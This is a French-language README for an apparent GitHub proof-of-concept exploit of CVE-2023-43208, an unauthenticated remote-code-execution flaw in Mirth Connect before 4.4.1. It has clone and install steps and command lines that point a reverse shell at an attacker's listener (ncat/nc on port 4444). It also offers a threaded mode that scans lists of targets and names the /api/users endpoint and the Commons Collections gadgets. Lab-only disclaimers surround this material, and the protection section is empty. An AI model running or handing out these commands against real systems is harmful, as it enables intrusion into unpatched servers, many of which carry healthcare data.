
Un exploit de preuve de concept pour CVE-2023-43208, une vulnérabilité d'exécution de code à distance dans Mirth Connect avant la version 4.4.1.
⚠️ POUR USAGE ÉDUCATIF ET EN LABORATOIRE UNIQUEMENT ⚠️
Un exploit de preuve de concept pour CVE-2023-43208, une vulnérabilité d'exécution de code à distance dans Mirth Connect avant la version 4.4.1.
Cet outil est strictement destiné à :
NE PAS UTILISER :
Vous êtes responsable du respect de toutes les lois et réglementations applicables. Une mauvaise utilisation de cet outil peut entraîner des poursuites pénales.
Cet exploit cible la vulnérabilité de désérialisation XML dans le point de terminaison /api/users de Mirth Connect, permettant une exécution de code à distance sans authentification sur les versions concernées (< 4.4.1).
Il s'agit d'une vulnérabilité CRITIQUE et elle ne doit être testée QUE dans des environnements de laboratoire isolés avec vos propres systèmes.
requirements.txtgit clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT
pip install -r requirements.txt 💻 Utilisation (LAB UNIQUEMENT) Mode interactif (recommandé en laboratoire) bash python exploit.py Mode ligne de commande bash
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive Options text -u, --url URL cible à exploiter (LAB UNIQUEMENT) -lh, --lhost Hôte d'écoute (votre IP) -lp, --lport Port d'écoute -f, --file Fichier contenant les URL cibles à analyser -o, --output Fichier de sortie pour enregistrer les résultats d'analyse -t, --threads Nombre de threads pour l'analyse (défaut : 50) --no-interactive Exécution en mode non interactif
🎯 Exemple d'environnement de laboratoire
Configurez votre laboratoire :
Installez une version vulnérable de Mirth Connect (< 4.4.1) dans une VM isolée
Utilisez un réseau contrôlé (ex. NAT/Host-only dans VirtualBox/VMware)
Ne l'exposez jamais à Internet
Démarrez votre listener :
ncat -lnvp 4444
nc -lnvp 4444
Exécutez l'exploit dans votre laboratoire :
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444
🧪 Exigences de l'environnement de test
📝 Détails techniques
Type de vulnérabilité : RCE par désérialisation XML
Versions concernées : Mirth Connect < 4.4.1
Version corrigée : 4.4.1 et ultérieures
Score CVSS : 9.8 (Critique)
Vecteur d'attaque : Réseau
Authentification : Aucune requise
L'exploit utilise des gadgets Commons Collections pour parvenir à une RCE via le point de terminaison /api/users.
🛡️ Mesures de protection
Si vous utilisez Mirth Connect :
👥 Crédits
Auteurs originaux : K3ysTr0K3R & Chocapikk Modifié par : M0h4 CVE : CVE-2023-43208
⚠️ AVERTISSEMENT FINAL
╔══════════════════════════════════════════════════════════════╗ ║ CE LOGICIEL EST RÉSERVÉ AU LAB UNIQUEMENT ║ ║ Toute utilisation non autorisée est ILLÉGALE ║ ║ Vous assumez TOUS les risques et responsabilités ║ ║ L'auteur décline TOUTE responsabilité en cas d'abus ║ ╚══════════════════════════════════════════════════════════════╝